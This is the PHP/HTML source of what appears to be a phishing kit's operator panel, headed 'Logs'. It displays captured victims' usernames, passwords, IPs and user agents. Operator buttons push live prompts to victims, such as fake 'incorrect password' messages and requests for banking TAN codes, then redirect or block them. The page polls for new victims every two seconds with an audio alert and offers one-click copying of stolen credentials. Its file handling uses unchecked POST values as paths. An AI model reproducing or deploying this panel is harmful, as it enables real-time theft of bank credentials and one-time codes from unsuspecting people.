<?php
include 'pwd.php';
?>
<!DOCTYPE html>
<html lang="en">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
	<meta name="description" content="">
	<meta name="author" content="">

	<title>Logs</title>

	<!-- Main Styles -->
	<link rel="stylesheet" href="assets/styles/style.min.css">
	
	<!-- Themify Icon -->
	<link rel="stylesheet" href="assets/fonts/themify-icons/themify-icons.css">

	<!-- mCustomScrollbar -->
	<link rel="stylesheet" href="assets/plugin/mCustomScrollbar/jquery.mCustomScrollbar.min.css">

	<!-- Waves Effect -->
	<link rel="stylesheet" href="assets/plugin/waves/waves.min.css">

	<!-- Sweet Alert -->
	<link rel="stylesheet" href="assets/plugin/sweet-alert/sweetalert.css">
	
	<!-- Data Tables -->
	<link rel="stylesheet" href="assets/plugin/datatables/media/css/dataTables.bootstrap.min.css">
	<link rel="stylesheet" href="assets/plugin/datatables/extensions/Responsive/css/responsive.bootstrap.min.css">

	<!-- Remodal -->
	<link rel="stylesheet" href="assets/plugin/modal/remodal/remodal.css">
	<link rel="stylesheet" href="assets/plugin/modal/remodal/remodal-default-theme.css">
	<script>
    	if ( window.history.replaceState ) {
      		window.history.replaceState( null, null, window.location.href );
    	}
	</script>
</head>

<body>
<div class="main-menu">
	<header class="header">
		<a href="index.php" class="logo"><i class="fa fa-windows"></i> Supermicro</a>
		<button type="button" class="button-close fa fa-times js__menu_close"></button>
	</header>
	<!-- /.header -->
	<div class="content">

	<div class="navigation">
			<h5 class="title">Navigation</h5>
			<!-- /.title -->
			<ul class="menu js__accordion">
				<li>
					<a class="waves-effect" href="index.php"><i class="menu-icon ti-dashboard"></i><span>Dashboard</span></a>
				</li>
				<li class="current">
					<a class="waves-effect" href="logs.php"><i class="menu-icon ti-user"></i><span>Logs</span></a>
				</li>	
				<li>
					<a class="waves-effect" href="log.php"><i class="menu-icon ti-search"></i><span>Visitors</span></a>
				</li>				
			</ul>

		</div>
		<!-- /.navigation -->
	</div>
	<!-- /.content -->
</div>
<!-- /.main-menu -->

<div class="fixed-navbar">
	<div class="pull-left">
		<button type="button" class="menu-mobile-button glyphicon glyphicon-menu-hamburger js__menu_mobile"></button>
		<h1 class="page-title">Logs</h1>
		<!-- /.page-title -->
	</div>
	<!-- /.pull-left -->
	
</div>
<!-- /.fixed-navbar -->




<div id="wrapper">
	<div class="main-content">
		<div class="row small-spacing">
			<div class="col-xs-12">
				<div class="box-content">
					<h4 class="box-title">Log list</h4>
					<!-- /.box-title -->


<?php
function append_text($token, $data){
    $current = file_get_contents("../accts/".$token."/list.php");
    $current .= $data."\n";
    file_put_contents("../accts/".$token."/list.php", $current);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {

	if(isset($_POST['action'])){
		$action = $_POST['action'];
		$log_id = $_POST['action_logid'];
		if(is_file("../accts/".$log_id."/callback.php")){
			if($action == "incorrect_login"){
				//incorect login
				append_text($log_id, "Invalid password");
				file_put_contents("../accts/".$log_id."/callback.php", "incorrect_password");
				echo '<div class="alert alert-success" role="alert"> <strong>Log Updated!</strong> Inccorect password message delivered. </div>';
			}
		
			if($action == "tan_requested"){
				//incorect login
				append_text($log_id, "Requested TAN Code");
				file_put_contents("../accts/".$log_id."/callback.php", "tan_requested");
				echo '<div class="alert alert-success" role="alert"> <strong>Log Updated!</strong> Requested TAN. </div>';
			}
			
			if($action == "tan_requested_error"){
				//incorect login
				append_text($log_id, "Invalid Tan Code");
				file_put_contents("../accts/".$log_id."/callback.php", "tan_requested_error");
				echo '<div class="alert alert-success" role="alert"> <strong>Log Updated!</strong> Requested TAN again. </div>';
			}
		
			if($action == "redirect"){
				//incorect login
				append_text($log_id, "Redirected");
				file_put_contents("../accts/".$log_id."/callback.php", "redirect");
				echo '<div class="alert alert-success" role="alert"> <strong>Log Updated!</strong> Redirected. </div>';
			}
		
			if($action == "block"){
				//incorect login
				append_text($token, "Blocked");
				file_put_contents("../accts/".$log_id."/callback.php", "block");
				echo '<div class="alert alert-success" role="alert"> <strong>Log Updated!</strong> Blocked. </div>';
			}
		}
	
	}

	//var_dump($_POST);
	if(isset($_POST['logid'])){
		$logid = $_POST['logid'];
		if(is_dir("../accts/".$logid)){
			//delete log
			if(file_exists("../accts/".$logid."/callback.php")){
				unlink("../accts/".$logid."/callback.php");
			}
			if(file_exists("../accts/".$logid."/index.php")){
				unlink("../accts/".$logid."/index.php");
			}
			if(file_exists("../accts/".$logid."/list.php")){
				unlink("../accts/".$logid."/list.php");
			}
			if(file_exists("../accts/".$logid."/log.php")){
				unlink("../accts/".$logid."/log.php");
			}
			rmdir("../accts/".$logid);

			echo '<div class="alert alert-success" role="alert"> <strong>REMOVED!</strong> Log: <b>'.$logid.'</b> has been removed. </div>';
		}else{
			echo '<div class="alert alert-danger" role="alert"> <strong>Oh snap!</strong> that log does not exist. </div>';
		}
		
	}

}

?>
					<table id="example" class="table table-striped table-bordered display" style="width:100%">
						<thead>
							<tr>
								<th>Login data</th>
								<th>IP</th>
								<th>Useragent</th>
								<th>Status</th>
								<th>Date</th>
								<th>Action</th>
							</tr>
						</thead>
						<tfoot>
							<tr>
								<th>Login data</th>
								<th>IP</th>
								<th>Useragent</th>
								<th>Status</th>
								<th>Date</th>
								<th>Action</th>
							</tr>
						</tfoot>
						<tbody class="log_list" id="tableBody">
							
<?php include("load_logs.php");?>

						</tbody>
					</table>
				</div>
				<!-- /.box-content -->
			</div>
			

			
		</div>
		<!-- /.row small-spacing -->		
		<footer class="footer">
			<ul class="list-inline">
				<li>2025 © SuperAdmin.</li>
			</ul>
		</footer>
	</div>
	<!-- /.main-content -->
</div><!--/#wrapper -->
<!-- Modal -->
<div class="modal fade" id="delete" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
	<div class="modal-dialog" role="document">
		<div class="modal-content">
			<div class="modal-header">
				<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
				<h4 class="modal-title" id="myModalLabel">Confirm delete</h4>
			</div>
			<div class="modal-body">
				<h4>Are you sure you want to remove log: <span id="logid">xxx</span></h4>
			</div>
			<div class="modal-footer">
				<button type="button" class="btn btn-danger waves-effect waves-light" data-dismiss="modal">Cancel</button>
				<button type="button" class="btn btn-success waves-effect waves-light">Confirm & Delete</button>
			</div>
		</div>
	</div>
</div>

<div class="modal fade" id="exampleModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
	<div class="modal-dialog" role="document">
		<div class="modal-content">
			<div class="modal-header">
				<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
				<h4 class="modal-title" id="myModalLabel">Confirm delete</h4>
			</div>
			<form method="post" action="">
      			<div class="modal-body">
				<h4>Are you sure you want to remove log: <span id="logid">xxx</span></h4>
        
				<input type="hidden" class="form-control" id="logidf" name="logid" value="">
        
      		</div>
      		<div class="modal-footer">
	  			<button type="button" class="btn btn-danger waves-effect waves-light" data-dismiss="modal">Cancel</button>
				<button type="submit" class="btn btn-success waves-effect waves-light">Confirm & Delete</button>
      		</div>
	  	</form>
		</div>
	</div>
</div>

<div class="modal fade" id="loghistory" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
	<div class="modal-dialog" role="document">
		<div class="modal-content">
			<div class="modal-header">
				<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
				<h4 class="modal-title" id="myModalLabel">Log history</h4>
			</div>
			<div class="modal-content">
				<pre><div id="logcontent"></div></pre>
			</div>
      		<div class="modal-footer">
	  			<button type="button" class="btn btn-danger waves-effect waves-light" data-dismiss="modal">Close</button>
      		</div>
		</div>
	</div>
</div>
	<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
	<!--[if lt IE 9]>
		<script src="assets/script/html5shiv.min.js"></script>
		<script src="assets/script/respond.min.js"></script>
	<![endif]-->
	<!-- 
	================================================== -->
	<!-- Placed at the end of the document so the pages load faster -->
	<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script>
  $(document).ready(function() {
    $('#loghistory').on('shown.bs.modal', function (event) { 
      var button = $(event.relatedTarget); 
      var sid = button.data('whatever'); 
      
      $.ajax({
        url: 'log_history.php',
        type: 'POST',
        data: { sid: sid },
        success: function(response) {
          //console.log('Raw Response:', response); // Log response to see what’s being returned
          
          $('#logcontent').text(response);
        },
        error: function(xhr, status, error) {
          console.error('AJAX Request Failed:', error);
        }
      });
    });
  });
</script>

<script>
    document.addEventListener("DOMContentLoaded", function() {
        // Attach click event listener to the entire table body
        document.getElementById("tableBody").addEventListener("click", function(event) {
            // Check if the clicked element is the SVG or its container for username copy
            if (event.target && (event.target.matches("span.copy-usr") || event.target.closest("span.copy-usr"))) {
                handleCopy(event, "#usrcopy", ".usrdisplay");
            }

            // Check if the clicked element is the SVG or its container for password copy
            if (event.target && (event.target.matches("span.copy-pas") || event.target.closest("span.copy-pas"))) {
                handleCopy(event, "#usrpass", ".pasdisplay");
            }

            // Check if the clicked element is the SVG or its container for retry password copy
            if (event.target && (event.target.matches("span.copy-pas2") || event.target.closest("span.copy-pas2"))) {
                handleCopy(event, "#usrpass2", ".pasdisplay2");
            }
        });

        function handleCopy(event, inputSelector, displaySelector) {
            // Get the hidden input field and display span in the same td as the clicked SVG
            var inputField = event.target.closest("td").querySelector(inputSelector);
            var displaySpan = event.target.closest("td").querySelector(displaySelector);

            if (inputField && displaySpan) {
                // Temporarily change the input type to text to select its content
                inputField.type = 'text';
                inputField.select();
                inputField.setSelectionRange(0, 99999); // For mobile devices

                // Copy the text to the clipboard
                document.execCommand("copy");

                // Hide the input field again
                inputField.type = 'hidden';

                // Show the message in the specified display span
                var originalText = displaySpan.innerText;
                displaySpan.innerText = "Copied to clipboard!";

                // Restore the original message after 3 seconds
                setTimeout(function() {
                    displaySpan.innerText = originalText;
                }, 3000); // 3000 milliseconds = 3 seconds
            }
        }
    });
</script>





<script>
var lastResponse = ''

setInterval(function() {
  $.ajax({
    type: "GET",
    url: "load_logs.php",
    dataType: "html",
    success: function(response) {
      $(".log_list").html(response)
      if (lastResponse && response !== lastResponse) {
        var audio = new Audio('alert.mp3')
        audio.play()
      }
      lastResponse = response
    }
  });
}, 2000);
</script>
	<script src="assets/scripts/jquery.min.js"></script>
	<script src="assets/scripts/modernizr.min.js"></script>
	<script src="assets/plugin/bootstrap/js/bootstrap.min.js"></script>
	<script src="assets/plugin/mCustomScrollbar/jquery.mCustomScrollbar.concat.min.js"></script>
	<script src="assets/plugin/nprogress/nprogress.js"></script>
	<script src="assets/plugin/sweet-alert/sweetalert.min.js"></script>
	<script src="assets/plugin/waves/waves.min.js"></script>
	<!-- Sparkline Chart -->
	<script src="assets/plugin/chart/sparkline/jquery.sparkline.min.js"></script>
	<script src="assets/scripts/chart.sparkline.init.min.js"></script>

	<!-- Data Tables -->
	<script src="assets/plugin/datatables/media/js/jquery.dataTables.min.js"></script>
	<script src="assets/plugin/datatables/media/js/dataTables.bootstrap.min.js"></script>
	<script src="assets/plugin/datatables/extensions/Responsive/js/dataTables.responsive.min.js"></script>
	<script src="assets/plugin/datatables/extensions/Responsive/js/responsive.bootstrap.min.js"></script>
	<script src="assets/scripts/datatables.demo.min.js"></script>

	<!-- Remodal -->
	<script src="assets/plugin/modal/remodal/remodal.min.js"></script>

	<script src="assets/scripts/main.min.js"></script>
	<script>
		$('#exampleModal').on('show.bs.modal', function (event) {
		var button = $(event.relatedTarget) // Button that triggered the modal
		var recipient = button.data('whatever') // Extract info from data-* attributes
		// If necessary, you could initiate an AJAX request here (and then do the updating in a callback).
		// Update the modal's content. We'll use jQuery here, but you could use a data binding library or other methods instead.
		var modal = $(this)
		modal.find('.modal-title').text('Confirm log delete ' + recipient)
		modal.find('#logid').text(recipient)
		modal.find('.modal-body #logidf').val(recipient)
		})
</script>
</body>
</html>